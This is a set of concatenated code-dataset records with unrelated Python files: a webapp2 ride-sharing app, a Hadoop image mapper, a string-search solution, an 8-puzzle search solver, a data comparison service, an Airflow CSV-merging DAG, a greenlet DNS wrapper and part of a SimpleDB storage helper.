ABQIAAAAg9WbCE_zwMIRW7jDFE_3ixQ2JlMNfqnGb2qqWZtmZLchh1TSjRS0zuchuhlR8g4tlMGrjg34sNmyjQ\n#!/usr/bin/env python2.7\n\nimport webapp2\nfrom simpleauth import SimpleAuthHandler\nfrom app.base_handler import BaseHandler\n\n# testing\nfrom app.controllers.test_account import create_user\n# end testing\n\nimport app.secrets as secrets\n\nfrom app.model import *\n\napp_config = {\n 'webapp2_extras.sessions': {\n 'cookie_name': '_simpleauth_sess',\n 'secret_key': secrets.SESSION_KEY\n },\n 'webapp2_extras.auth': {\n 'user_attributes': []\n }\n}\n\nimport wsgiref.handlers\nimport datetime\nfrom datetime import date\nfrom google.appengine.api import mail\n\nimport jinja2\nfrom google.appengine.ext import db\n\nfrom app.pygeocoder import Geocoder\n\nimport logging\nimport urllib\nimport random\nimport os.path\n\nfrom app.controllers.circles import *\nfrom app.controllers.events import *\nfrom app.controllers.rides import *\nfrom app.controllers.comments import *\nfrom app.controllers.users import *\n\nfrom app.common.toolbox import doRender\n\n# Creates Community entry on first run.\naquery = db.Query(Community)\nif aquery.count() == 0:\n #development site\n community = Community(\n name = secrets.community['name'],\n address = secrets.community['address'],\n lat = secrets.community['lat'],\n lng = secrets.community['lng']\n )\n community.put()\n \nclass MapHandler(BaseHandler):\n def get(self):\n self.auth()\n user = self.current_user()\n doRender(self, 'index_rework.html', {\n 'user': user\n })\n\nclass LoginHandler(BaseHandler):\n def get(self):\n doRender(self, 'loginPage.html', {})\n\nclass HomeHandler(BaseHandler):\n def get(self):\n self.auth()\n aquery = db.Query(Community)\n community = aquery.get()\n user = self.current_user()\n\n notis = Notification.all().filter('user = ', user.key()).fetch(10)\n\n today = datetime.date.today()\n upcoming = Ride.all().filter('date > ', today).fetch(20)\n\n for up in upcoming:\n if user.key() in up.passengers:\n up.is_pass = True\n else:\n up.is_pass = False\n if user.key() == up.driver.key():\n up.is_driver = True\n else:\n up.is_driver = False\n\n doRender(self, 'home.html', { \n 'user': user,\n 'notis': notis,\n 'upcoming': upcoming\n })\n\nclass IncorrectHandler(BaseHandler):\n def get(self):\n doRender(self, 'error.html', {\n 'error_message': \"Page does not exist.\"\n 
})\n\nclass HelpHandler(BaseHandler):\n    def get(self):\n        user = self.current_user()\n\n        doRender(self, 'help.html', {\n            'user': user\n        })\n\nclass DetailHandler(BaseHandler):\n    def get(self):\n        self.auth()\n        user = self.current_user()\n\n        doRender(self, 'details.html', {\n            'user': user\n        })\n    def post(self):\n        self.auth()\n        json_str = self.request.body\n        data = json.loads(json_str)\n\n        self.auth()\n        user = self.current_user()\n\n        user.email = data['email']\n        user.phone = data['phone']\n\n        user.put()\n\n        resp = {\n            'message': 'Information updated'\n        }\n\n        self.response.write(json.dumps(resp))\n\napp = webapp2.WSGIApplication([\n    ('/', LoginHandler),\n    ('/map', MapHandler),\n\n    # controllers/rides.py\n    ('/rides', RideHandler),\n    ('/ride/(\\d+)', GetRideHandler),\n    ('/join_ride', RideJoinHandler),\n    (\"/newride\", NewRideHandler),\n    ('/home', HomeHandler),\n    # end rides\n\n    # controllers/users.py\n    ('/user/(\\d+)', GetUserHandler),\n    ('/user/edit/(\\d+)', EditUserHandler),\n    ('/user', UserHandler),\n    # end users\n\n    # controllers/comments.py\n    ('/comment', CommentHandler),\n    ('/comments', FetchComments),\n    ('/comment/(\\d+)', GetComment),\n    # end comments\n\n    # controllers/circles.py\n    ('/circle/(\\d+)', GetCircleHandler),\n    ('/addCircle', AddCircleHandler),\n    ('/newCircle',NewCircleHandler),\n    ('/circles', CircleHandler),\n    ('/join_circle', JoinCircle),\n    # end circles\n\n    # controllers/events.py\n    ('/event/(\\d+)', GetEventHandler),\n    ('/events', EventHandler),\n    ('/newevent', NewEventHandler),\n    # end events\n\n    # auth routes\n    webapp2.Route(\n        '/auth/',\n        handler='app.auth_handler.AuthHandler:_simple_auth',\n        name='auth_login'\n    ),\n    webapp2.Route(\n        '/auth//callback', \n        handler='app.auth_handler.AuthHandler:_auth_callback',\n        name='auth_callback'\n    ),\n    webapp2.Route(\n        '/logout',\n        handler='app.auth_handler.AuthHandler:logout',\n        name='logout'\n    ),\n    ('/details', DetailHandler),\n    # end auth routes\n    ('/testing', create_user),\n    ('/help', HelpHandler),\n    ('/.*', IncorrectHandler)\n    ],\n    config = app_config,\n    debug = True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"74560548","text":"import hadoopy\nimport imfeat\nimport impoint\nimport os\nimport numpy as np\nimport picarus._features as features\n\n\ndef _parse_height_width():\n    try:\n        image_width = image_height = int(os.environ['IMAGE_LENGTH'])\n    except KeyError:\n        image_width = int(os.environ['IMAGE_WIDTH'])\n        image_height = int(os.environ['IMAGE_HEIGHT'])\n    return image_height, image_width\n\n\nclass Mapper(object):\n\n    def __init__(self):\n        self._feat = features.select_feature_point(os.environ['FEATURE'])\n        self._image_height, self._image_width = _parse_height_width()\n\n    def map(self, name, image_data):\n        try:\n            image = imfeat.image_fromstring(image_data)\n        except:\n            hadoopy.counter('DATA_ERRORS', 'ImageLoadError')\n            return\n        try:\n            image = imfeat.resize_image(image, self._image_height, self._image_width)\n        except:\n            hadoopy.counter('DATA_ERRORS', 'ImageLoadError')\n        try:\n            for x in self._feat(image):\n                yield name, x\n        except:\n            
hadoopy.counter('DATA_ERRORS', 'UnkImageType')\n return\n\n\nif __name__ == '__main__':\n hadoopy.run(Mapper)\n","sub_path":"picarus/vision/feature_point_compute.py","file_name":"feature_point_compute.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"61877363","text":"\n#Implement strStr(). Returns the index of the first occurrence of needle in haystack, or -1 if needle is not part of haystack.\nclass Solution(object):\n def strStr(self, haystack, needle):\n \"\"\"\n :type haystack: str\n :type needle: str\n :rtype: int\n \"\"\"\n n, m = len(haystack), len(needle)\n if m > n:\n return -1\n elif m == 0:\n return 0\n for i in range(n - m + 1):\n tag = True\n j = i\n for s in needle:\n if haystack[j] != s:\n tag = False\n break\n j += 1\n if tag:\n return i\n return -1\n","sub_path":"py/028 Implement strStr/ImplementstrStr.py","file_name":"ImplementstrStr.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"194654470","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nfrom random import randrange\nclass State:\n def __init__(self, state, directionFlag=None, parent=None):\n self.state = state \n self.direction = ['up', 'down', 'right', 'left']\n if directionFlag:\n self.direction.remove(directionFlag) \n self.parent = parent\n self.symbol = ' '\n\n def GetEmptyPos(self):\n postion = np.where(self.state == self.symbol)\n return postion\n \n def GetDirection(self):\n return self.direction\n \n def GetPath(self): #返回含有目标的搜索路径\n path = []\n path.append(self)\n while self.parent and self.parent != originState: #记录含有目标的路径\n path.append(self.parent)\n self = self.parent\n path.reverse()\n return path\n \n def SeekTarget(self): \n OPEN = [] \n CLOSED = [] \n OPEN.append(self) \n steps = 1 \n nodeNumber = 0;\n while len(OPEN) > 0: \n n = OPEN.pop(0)\n CLOSED.append(n)\n childStates = n.Expand() #\n nodeNumber += len(childStates)\n for s in childStates:\n if (s.state == s.answer).all(): #判断是否所有的元素都是匹配的\n return s.GetPath(),steps+1,nodeNumber\n childStates.extend(OPEN)\n OPEN = childStates.copy()\n steps += 1\n else:\n return None\n\n\n def Expand(self): #扩展当前结点\n if not self.direction:\n return []\n childStates = []\n boarder = len(self.state) - 1 \n \n row, col = self.GetEmptyPos()\n if 'up' in self.direction and row > 0: #判断是否可以向上移动 \n s = self.state.copy()\n temp = s.copy()\n s[row, col] = s[row-1, col]\n s[row-1, col] = temp[row, col]\n news = State(s, directionFlag='down', parent=self)\n childStates.append(news)\n \n if 'down' in self.direction and row < boarder: #是否可以向下移动\n s = self.state.copy()\n temp = s.copy()\n s[row, col] = s[row+1, col]\n s[row+1, col] = temp[row, col]\n news = State(s, directionFlag='up', parent=self)\n childStates.append(news)\n \n if 'left' in self.direction and col > 0:#是否可以向左移动\n s = self.state.copy()\n temp = s.copy()\n s[row, col] = s[row, col-1]\n s[row, col-1] = temp[row, col]\n news = State(s, directionFlag='right', parent=self)\n childStates.append(news)\n \n if self.direction.count('right') and col < boarder: #是否可以向右移动\n s = self.state.copy()\n temp = s.copy()\n s[row, col] = s[row, col+1]\n s[row, col+1] = temp[row, col]\n news = State(s, directionFlag='left', parent=self)\n childStates.append(news)\n return childStates\n\n \ndef GenerateMatrixAuto(): #自动生成矩阵\n# NewState = np.array([[2, ' ' , 3], [1, 8 , 4], [7, 6, 5]]).copy()\n NewState = np.array([[1, ' ' , 5], [2, 
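# A compact slice-based take on the brute-force strStr above; same O(n*m)
# scan, cross-checked against str.find. A sketch, not the record's code.
def str_str(haystack, needle):
    n, m = len(haystack), len(needle)
    if m == 0:
        return 0
    for i in range(n - m + 1):
        if haystack[i:i + m] == needle:
            return i
    return -1

assert str_str('hello', 'll') == 'hello'.find('ll') == 2
assert str_str('aaaaa', 'bba') == -1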
8 , 4], [7, 6, 3]]).copy()\n# print(NewState)\n# return NewState\n emptyPosX = 0;\n emptyPosY = 1;\n X = Y = 0;\n while(1):\n X = randrange(0,3)\n Y = randrange(0,3)\n if(NewState[X][Y] != NewState[emptyPosX][emptyPosY]):\n temp = NewState[X,Y]\n NewState[X,Y] = NewState[emptyPosX,emptyPosY]\n NewState[emptyPosX,emptyPosY] = temp\n break\n print(NewState)\n return NewState\n \ndef GenerateMatrixHand(): #手动输入矩阵\n NewState = np.array([[2, ' ' , 3], [1, 8 , 4], [7, 6, 5]]).copy()\n str = input(\"请依次输入矩阵元素,0代表空格: \")\n inputMatrix = []\n inputMatrix = str.split(\",\")\n emptyPos = inputMatrix.index('0')\n count = 0\n while(count < 9):\n if(count != emptyPos):\n NewState[count // 3,count % 3] = int(inputMatrix[count])\n else:\n NewState[count // 3,count % 3] = ' '\n count = count + 1\n print(NewState)\n return NewState\n\nif __name__ == '__main__':\n while(1):\n choic =eval(input(\"输入1选择自动生成初始状态|输入2手动输入初始状态|输入3选择默认初始状态: \"))\n if choic != 1 and choic != 2 and choic != 3:\n print(\"输入有误!\",\"\\n\")\n else:\n break\n print(\"生成的初始状态为: \")\n if(choic == 1):\n originState = State(GenerateMatrixAuto())\n elif(choic == 2):\n originState = State(GenerateMatrixHand())\n else:\n # newState = np.array([[2, ' ' , 3], [1, 5 , 4], [7, 6, 8]]).copy()\n newState = np.array([[2, ' ' , 5], [1, 3 , 4], [7, 6, 8]]).copy()\n originState = State(newState)\n print(newState)\n \n State.answer = np.array([[1, 2, 3], [8, ' ', 4], [7, 6, 5]]) \n s = State(state=originState.state)\n path, steps ,nodeNumber= s.SeekTarget()\n if path: #打印含目标结点的路径\n print(\"从起始状态到目标结点的路径为: \")\n for node in path: \n print(node.state)\n print(\" |\")\n print(\" v\")\n print(\"扩展结点数为:%d\" %steps)\n print(\"生成结点数为:%d\" %nodeNumber)\n else:\n print(\"目标结点不可到达\")","sub_path":"源程序/DFS.py","file_name":"DFS.py","file_ext":"py","file_size_in_byte":5552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"644357273","text":"from .dataService import DataService\nfrom utils.stats import box_plots, date_bins, date_histograms, counts\n\n\nclass ComparisonService(object):\n def __init__(self, config=None):\n self.dataAccess = DataService()\n\n def frequency_comparison(self,\n startDate=None,\n endDate=None,\n requestTypes=[],\n set1={'district': None, 'list': []},\n set2={'district': None, 'list': []}):\n\n def get_data(district, items, bins, start, end):\n common = {\n 'startDate': start,\n 'endDate': end,\n 'requestTypes': requestTypes\n }\n\n if district == 'nc':\n common['ncList'] = items\n groupField = 'nc'\n elif district == 'cc':\n common['cdList'] = items\n groupField = 'cd'\n\n fields = [groupField, 'createddate']\n filters = self.dataAccess.comparisonFilters(**common)\n df = self.dataAccess.query(fields, filters, table='vis')\n\n return date_histograms(\n df,\n dateField='createddate',\n bins=bins,\n groupField=groupField,\n groupFieldItems=items)\n\n bins, start, end = date_bins(startDate, endDate)\n set1data = get_data(set1['district'], set1['list'], bins, start, end)\n set2data = get_data(set2['district'], set2['list'], bins, start, end)\n\n return {\n 'bins': list(bins.astype(str)),\n 'set1': {\n 'district': set1['district'],\n 'counts': set1data\n },\n 'set2': {\n 'district': set2['district'],\n 'counts': set2data\n }\n }\n\n def ttc_comparison(self,\n startDate=None,\n endDate=None,\n requestTypes=[],\n set1={'district': None, 'list': []},\n set2={'district': None, 'list': []}):\n\n def get_data(district, items):\n common = {\n 'startDate': startDate,\n 'endDate': endDate,\n 
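# The SeekTarget loop above never checks CLOSED before re-expanding a state;
# a minimal sketch of the same search skeleton with a visited set, over any
# hashable states. is_goal/expand are placeholders for State's methods.
from collections import deque

def search(start, is_goal, expand):
    frontier = deque([start])   # popleft() gives BFS; pop() would give DFS
    seen = {start}
    while frontier:
        node = frontier.popleft()
        if is_goal(node):
            return node
        for child in expand(node):
            if child not in seen:
                seen.add(child)
                frontier.append(child)
    return None

# toy demo: reach 5 from 0 with +1/+2 moves
print(search(0, lambda s: s == 5, lambda s: [s + 1, s + 2]))  # -> 5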
'requestTypes': requestTypes\n }\n\n if district == 'nc':\n common['ncList'] = items\n groupField = 'nc'\n elif district == 'cc':\n common['cdList'] = items\n groupField = 'cd'\n\n fields = [groupField, '_daystoclose']\n filters = self.dataAccess.comparisonFilters(**common)\n df = self.dataAccess.query(fields, filters, table='vis')\n\n return box_plots(\n df,\n plotField='_daystoclose',\n groupField=groupField,\n groupFieldItems=items)\n\n set1data = get_data(set1['district'], set1['list'])\n set2data = get_data(set2['district'], set2['list'])\n\n return {\n 'set1': {\n 'district': set1['district'],\n 'data': set1data\n },\n 'set2': {\n 'district': set2['district'],\n 'data': set2data\n }\n }\n\n def counts_comparison(self,\n startDate=None,\n endDate=None,\n requestTypes=[],\n set1={'district': None, 'list': []},\n set2={'district': None, 'list': []}):\n\n def get_data(district, items):\n common = {\n 'startDate': startDate,\n 'endDate': endDate,\n 'requestTypes': requestTypes\n }\n\n if district == 'nc':\n common['ncList'] = items\n elif district == 'cc':\n common['cdList'] = items\n\n fields = ['requestsource']\n filters = self.dataAccess.comparisonFilters(**common)\n df = self.dataAccess.query(fields, filters, table='vis')\n\n return counts(df, 'requestsource')\n\n set1data = get_data(set1['district'], set1['list'])\n set2data = get_data(set2['district'], set2['list'])\n\n return {\n 'set1': {\n 'district': set1['district'],\n 'source': set1data\n },\n 'set2': {\n 'district': set2['district'],\n 'source': set2data\n }\n }\n\n async def comparison(self,\n type=None,\n startDate=None,\n endDate=None,\n requestTypes=[],\n set1={'district': None, 'list': []},\n set2={'district': None, 'list': []}):\n\n args = {\n 'startDate': startDate,\n 'endDate': endDate,\n 'requestTypes': requestTypes,\n 'set1': set1,\n 'set2': set2}\n\n if type == 'frequency':\n return self.frequency_comparison(**args)\n elif type == 'timetoclose':\n return self.ttc_comparison(**args)\n elif type == 'counts':\n return self.counts_comparison(**args)\n else:\n return {'Error': 'Unrecognized comparison type'}\n","sub_path":"server/src/services/comparisonService.py","file_name":"comparisonService.py","file_ext":"py","file_size_in_byte":5340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"242103837","text":"import csv\nimport os\nimport re\nimport datetime as dt \nfrom datetime import datetime, timezone\nfrom os.path import exists\nfrom datetime import timedelta\nfrom airflow import DAG\nfrom airflow.operators.python_operator import PythonOperator\nfrom typing import Iterator, Dict, Optional, List\n\n\ndef preprocessing(path: str, run_log_file: str) -> Optional[List]:\n\t\"\"\"\n\tArgument: a string representing the path where CSV files to process are located.\n\tReturns: a numeric value signaling whether processing is needed or not.\n\n\tThis function will consult a log containing a timestamp for the last time that CSV files were processed.\n\tIf any files were dropped into the dir AFTER the last time the process ran, then only those files will be processed\n\tand the Combined.csv file will be updated.\n\tIf the log file does not exist, this function will create and initialize it.\n\t\"\"\"\n\tf_name = path + '/' + run_log_file\n\tts = datetime.now().timestamp()\n\tif not exists(f_name):\n\t\twith open(f_name, 'w') as f:\n\t\t\twriter = csv.writer(f)\n\t\t\twriter.writerow(['last_run'])\n\t\t\twriter.writerow([ts])\n\t\treturn files_to_process(path, 
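# The comparison() coroutine above dispatches on a type string via if/elif;
# an equivalent hedged sketch using a dict of bound methods. The two stub
# methods stand in for the real frequency/ttc implementations.
class ComparisonDispatch(object):
    def frequency_comparison(self, **kwargs):
        return {'type': 'frequency'}

    def ttc_comparison(self, **kwargs):
        return {'type': 'timetoclose'}

    def comparison(self, type=None, **kwargs):
        handlers = {
            'frequency': self.frequency_comparison,
            'timetoclose': self.ttc_comparison,
        }
        handler = handlers.get(type)
        return handler(**kwargs) if handler else {'Error': 'Unrecognized comparison type'}

print(ComparisonDispatch().comparison(type='frequency'))  # {'type': 'frequency'}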
0.0)\n\telse:\n\t\twith open(f_name, 'r') as f: \n\t\t\ttimes = f.readlines() \n\t\tlastRun = times[-1]\n\t\tlastRun = float(lastRun.split(',')[0])\n\t\twith open(f_name, 'a+') as f:\n\t\t\twriter = csv.writer(f)\n\t\t\twriter.writerow([ts])\n\t\treturn files_to_process(path, lastRun)\n\n\ndef files_to_process(path: str, last_run: float) -> Optional[List]:\n\t\"\"\"\n\tArgument: a string representing the path where CSV files to process are located.\n\t\t\t a float representing the timestamp of the last time the process was run.\n\tReturns: a list of CSV files found in the directory pointed to by the path string.\n\t\"\"\"\n\tif len(path) == 0:\n\t\treturn None\n\t\n\tfiles = [path + '/' + f for f in os.listdir(path) if '.csv' in f]\n\n\tif last_run != 0.0:\n\t\tfiles = [file for file in files if os.path.getmtime(file) > last_run]\n\n\treturn files\n\n\ndef read_from_csv(files: list) -> Dict:\n\t\"\"\"\n\tArgument: a list containing the path to a CSV file\n\tReturns: one row at a time as a dictionary\n\t\"\"\"\n\tcombined_dict = {}\n\t# The regex pattern will match any filename starting with path to file, followed by two words separated by space (it will capture this substring),\n\t# followed by space and zero or more digits and terminated by '.csv' extension.\n\t# Example: '/develop/data/Asia Prod 3.csv' \n\tcsv_file_pattern = r'[\\.\\w\\/\\s]*\\/([A-Za-z]+\\s[A-Za-z]+)\\s*\\d*\\.csv'\n\tfor file in files:\n\t\tp = re.compile(csv_file_pattern)\n\t\tm = p.match(file)\n\t\tenv = ''\n\t\tif m == None:\n\t\t\tprint('Skipping {} since it does not match CSV file pattern.'.format(file))\n\t\t\tcontinue\n\t\telse:\n\t\t\tenv = m.group(1)\n\n\t\twith open(file, 'r') as f:\n\t\t\t### Add some clarification here for accounting for inconsistent header names\n\t\t\tcolumns = ['source_ip', 'count', 'events_per_second']\n\t\t\treader = csv.DictReader(f, fieldnames=columns, delimiter=',')\n\t\t\tnext(reader)\n\t\t\tfor row in reader:\n\t\t\t\tif row['source_ip'] not in combined_dict.keys():\n\t\t\t\t\tcombined_dict[row['source_ip']] = env\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\n\treturn combined_dict\n\n\ndef sort_values(c_dict: dict) -> List:\n\t\"\"\"\n\tArguments: a dictionary containing ip addresses as keys and corresponding environment as values\n\tReturns: a list of tuples ordered by ip address value \n\t\"\"\"\n\tvalue_pairs = [(ip, c_dict[ip]) for ip in c_dict.keys()]\n\t# Sort based on the numeric value of the first integer in IP address\n\tvalue_pairs.sort(key=lambda x: int(x[0].split('.')[0]))\n\treturn value_pairs\n\n\ndef write_to_csv(val_list: list, f_name: str) -> int:\n\t\"\"\"\n\tArgument: a list of tuples that will be used to write to csv file\n\tReturns: integer signaling exit status:\n\t\t\t\t0: Successfully created and wrote to Combined.txt\n\t\t\t\t1: Nothing to process\n\t\t\t\t2: Successfully updated Combined.txt\n\n\tThis function will attempt to write the contents of val_list into CSV file f_name.\n\tIf f_name does not already exist at the time the function is called, this function will create the file and then write to it.\n\tOtherwise, the function will merge any new information contained in val_list with the information already contained in f_name, giving\n\tpriority to the new information found in val_list. 
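# A small demonstration of the environment-name regex documented in
# read_from_csv above; the sample paths are illustrative.
import re

csv_file_pattern = r'[\.\w\/\s]*\/([A-Za-z]+\s[A-Za-z]+)\s*\d*\.csv'
pattern = re.compile(csv_file_pattern)

for path in ['/develop/data/Asia Prod 3.csv', '/develop/data/notes.txt']:
    m = pattern.match(path)
    # group(1) captures the two-word environment name, e.g. 'Asia Prod'
    print(path, '->', m.group(1) if m else 'skipped')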
\n\t\"\"\"\n\tif len(val_list) == 0:\n\t\treturn 1 \n\n\tif not exists(f_name):\n\t\twith open(f_name, 'w') as f:\n\t\t\twriter = csv.writer(f)\n\t\t\twriter.writerow(['Source Ip', 'Environment'])\n\t\t\tfor row in val_list:\n\t\t\t\twriter.writerow(row)\n\t\treturn 0\n\telse:\n\t\tcombined_dict = {}\n\t\tfor pair in val_list:\n\t\t\tif pair[0] not in combined_dict:\n\t\t\t\tcombined_dict[pair[0]] = pair[1]\n\n\t\twith open(f_name, 'r') as f:\n\t\t\treader = csv.DictReader(f)\n\t\t\t#Merge values with those already on the file. Note that new values will take precedence over those already on file. Thus updating the contents.\n\t\t\tfor row in reader:\n\t\t\t\tif row['Source Ip'] not in combined_dict:\n\t\t\t\t\tcombined_dict[row['Source Ip']] = row['Environment']\n\n\t\tupdated_val_list = sort_values(combined_dict)\n\n\t\twith open(f_name, 'w') as f:\n\t\t\twriter = csv.writer(f)\n\t\t\twriter.writerow(['Source Ip', 'Environment'])\n\t\t\tfor row in updated_val_list:\n\t\t\t\twriter.writerow(row)\n\n\t\treturn 2\n\n\ndef combine_to_single_csv():\n\tdata_path = '../data'\n\tout_file = data_path + '/Combined.csv'\n\tcsv_files = preprocessing(path=data_path, run_log_file='process_time_log.csv')\n\tcombined_dict = read_from_csv(csv_files)\n\tvalue_pairs = sort_values(c_dict=combined_dict)\n\texit_status = write_to_csv(value_pairs, out_file)\n\n\tif exit_status == 0:\n\t\tprint('File {} was successuflly created.'.format(out_file))\n\telif exit_status == 1:\n\t\tprint('No files to process.')\n\telif exit_status == 2:\n\t\tprint('File {} was updated with new CSV information.'.format(out_file))\n\n\ndefault_args = { 'owner': 'cbeas', \n\t\t\t\t 'start_date': dt.datetime(2021, 10, 30), \n\t\t\t\t 'retries': 1, \n\t\t\t\t 'retry_delay': dt.timedelta(minutes=5),\n\t\t\t\t}\n\nwith DAG('CombineToCsv', \n\t\t default_args=default_args,\n\t\t schedule_interval=timedelta(days=1)\n\t) as dag:\n\n\tstart_this = BashOperator(task_id='starting', \n\t\t\t\t\t\t\t\t bash_command='echo \"Combine to single CSV process has started.\"',\n\t\t\t\t\t\t\t\t )\n\n\ttask = PythonOperator(task_id='CombineToSingleCSV', python_callable=combine_to_single_csv)\n\n\tcomplete = BashOperator(task_id='completing', \n\t\t\t\t\t\t\t\t bash_command='echo \"Combine to single CSV process has completed.\"',\n\t\t\t\t\t\t\t\t )\n\n\tstart_this >> task >> complete\n\n","sub_path":"dag/CombineToCsv.py","file_name":"CombineToCsv.py","file_ext":"py","file_size_in_byte":6290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"604620885","text":"import time\n\nfrom engine import settings\nfrom engine.modules.worlds.matchmaking import handle_matchmaking\nfrom game.instance import worlds\nfrom game.services.startgame import create_world\n\n\nclass QueueThread:\n def __init__(self, server):\n self.server = server\n\n self.enabled = settings.get('worlds.search_enabled')\n\n def run(self):\n # this thread tries to match players into queues\n if not self.enabled:\n return\n\n starting_parties = handle_matchmaking()\n\n for i, party in enumerate(starting_parties):\n world, l_countries = create_world()\n worlds.save(world)\n\n # send invitation to each client, but they have to accept it themselves\n for client_id in party['uids']:\n self.server.send(client_id, {\n \"route\": \"Parties:invite\",\n \"wid\": world.wid,\n })\n\n if i % 30 == 0:\n # take a 200ms break\n time.sleep(0.2)\n\n\n # 600 ms sleep\n 
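# The DAG at the end of CombineToCsv.py above instantiates BashOperator, but
# only PythonOperator is imported there. A minimal corrected sketch of that
# wiring, with Airflow 1.x-style imports matching the record; bash commands
# are shortened for illustration.
import datetime as dt
from datetime import timedelta

from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.operators.python_operator import PythonOperator

def combine_to_single_csv():
    pass  # placeholder for the callable defined in the record above

default_args = {'owner': 'cbeas', 'start_date': dt.datetime(2021, 10, 30)}

with DAG('CombineToCsv', default_args=default_args,
         schedule_interval=timedelta(days=1)) as dag:
    start_this = BashOperator(task_id='starting',
                              bash_command='echo "started"')
    task = PythonOperator(task_id='CombineToSingleCSV',
                          python_callable=combine_to_single_csv)
    complete = BashOperator(task_id='completing',
                            bash_command='echo "completed"')
    start_this >> task >> complete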
time.sleep(0.6)\n","sub_path":"serverapp/threads/QueueThread.py","file_name":"QueueThread.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"307868822","text":"# -*- coding: utf-8 -*-\r\n# 2020/5/8\r\n# create by: snower\r\n\r\nimport greenlet\r\n\r\n\r\ndef warp_coroutine(BaseDNSResolver):\r\n class DNSResolver(BaseDNSResolver):\r\n async def gethostbyname(self, hostname, timeout=None):\r\n child_gr = greenlet.getcurrent()\r\n main = child_gr.parent\r\n assert main is not None, \"must be running in async func\"\r\n self.resolve(hostname, lambda hostname, ip: child_gr.switch(ip), timeout)\r\n return main.switch()\r\n\r\n return DNSResolver\r\n","sub_path":"sevent/coroutines/dns.py","file_name":"dns.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"135719564","text":"# Copyright (C) 2015-2016 Regents of the University of California\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\nimport base64\nimport bz2\nimport os\nimport socket\nimport logging\nimport types\n\nimport errno\nfrom contextlib import closing\nfrom ssl import SSLError\nfrom multiprocessing import cpu_count\n\n# Python 3 compatibility imports\nimport itertools\n\n\nimport boto\nfrom bd2k.util.exceptions import panic\nfrom concurrent.futures import ThreadPoolExecutor\nfrom six import iteritems\n\nfrom bd2k.util.retry import retry\nfrom boto.exception import (SDBResponseError,\n BotoServerError,\n S3ResponseError,\n S3CreateError,\n S3CopyError)\n\nlog = logging.getLogger(__name__)\n\n\nclass SDBHelper(object):\n \"\"\"\n A mixin with methods for storing limited amounts of binary data in an SDB item\n\n >>> import os\n >>> H=SDBHelper\n >>> H.presenceIndicator()\n '000'\n >>> H.binaryToAttributes(None)\n {}\n >>> H.attributesToBinary({})\n (None, 0)\n >>> H.binaryToAttributes('')\n {'000': 'VQ=='}\n >>> H.attributesToBinary({'000': 'VQ=='})\n ('', 1)\n\n Good pseudo-random data is very likely smaller than its bzip2ed form. Subtract 1 for the type\n character, i.e 'C' or 'U', with which the string is prefixed. We should get one full chunk:\n\n >>> s = os.urandom(H.maxRawValueSize-1)\n >>> d = H.binaryToAttributes(s)\n >>> len(d), len(d['000'])\n (1, 1024)\n >>> H.attributesToBinary(d) == (s, 1)\n True\n\n One byte more and we should overflow four bytes into the second chunk, two bytes for\n base64-encoding the additional character and two bytes for base64-padding to the next quartet.\n\n >>> s += s[0]\n >>> d = H.binaryToAttributes(s)\n >>> len(d), len(d['000']), len(d['001'])\n (2, 1024, 4)\n >>> H.attributesToBinary(d) == (s, 2)\n True\n\n \"\"\"\n # The SDB documentation is not clear as to whether the attribute value size limit of 1024\n # applies to the base64-encoded value or the raw value. 
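# The DNSResolver above parks the current greenlet and resumes it from the
# resolve() callback; a minimal runnable sketch of that parent/child switch.
import greenlet

def child_fn():
    parent = greenlet.getcurrent().parent
    parent.switch('resolved-ip')  # analogous to the resolve callback firing

child = greenlet.greenlet(child_fn)
result = child.switch()  # start the child; returns when it switches back
print(result)            # -> 'resolved-ip'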
It suggests that responses are\n # automatically encoded from which I conclude that the limit should apply to the raw,\n # unencoded value. However, there seems to be a discrepancy between how Boto computes the\n # request signature if a value contains a binary data, and how SDB does it. This causes\n # requests to fail signature verification, resulting in a 403. We therefore have to\n # base64-encode values ourselves even if that means we loose a quarter of capacity.\n\n maxAttributesPerItem = 256\n maxValueSize = 1024\n maxRawValueSize = maxValueSize * 3 / 4\n # Just make sure we don't have a problem with padding or integer truncation:\n assert len(base64.b64encode(' ' * maxRawValueSize)) == 1024\n assert len(base64.b64encode(' ' * (1 + maxRawValueSize))) > 1024\n\n @classmethod\n def _reservedAttributes(cls):\n \"\"\"\n Override in subclass to reserve a certain number of attributes that can't be used for\n chunks.\n \"\"\"\n return 0\n\n @classmethod\n def _maxChunks(cls):\n return cls.maxAttributesPerItem - cls._reservedAttributes()\n\n @classmethod\n def maxBinarySize(cls):\n return cls._maxChunks() * cls.maxRawValueSize - 1 # for the 'C' or 'U' prefix\n\n @classmethod\n def _maxEncodedSize(cls):\n return cls._maxChunks() * cls.maxValueSize\n\n @classmethod\n def binaryToAttributes(cls, binary):\n if binary is None: return {}\n assert len(binary) <= cls.maxBinarySize()\n # The use of compression is just an optimization. We can't include it in the maxValueSize\n # computation because the compression ratio depends on the input.\n compressed = bz2.compress(binary)\n if len(compressed) > len(binary):\n compressed = 'U' + binary\n else:\n compressed = 'C' + compressed\n encoded = base64.b64encode(compressed)\n assert 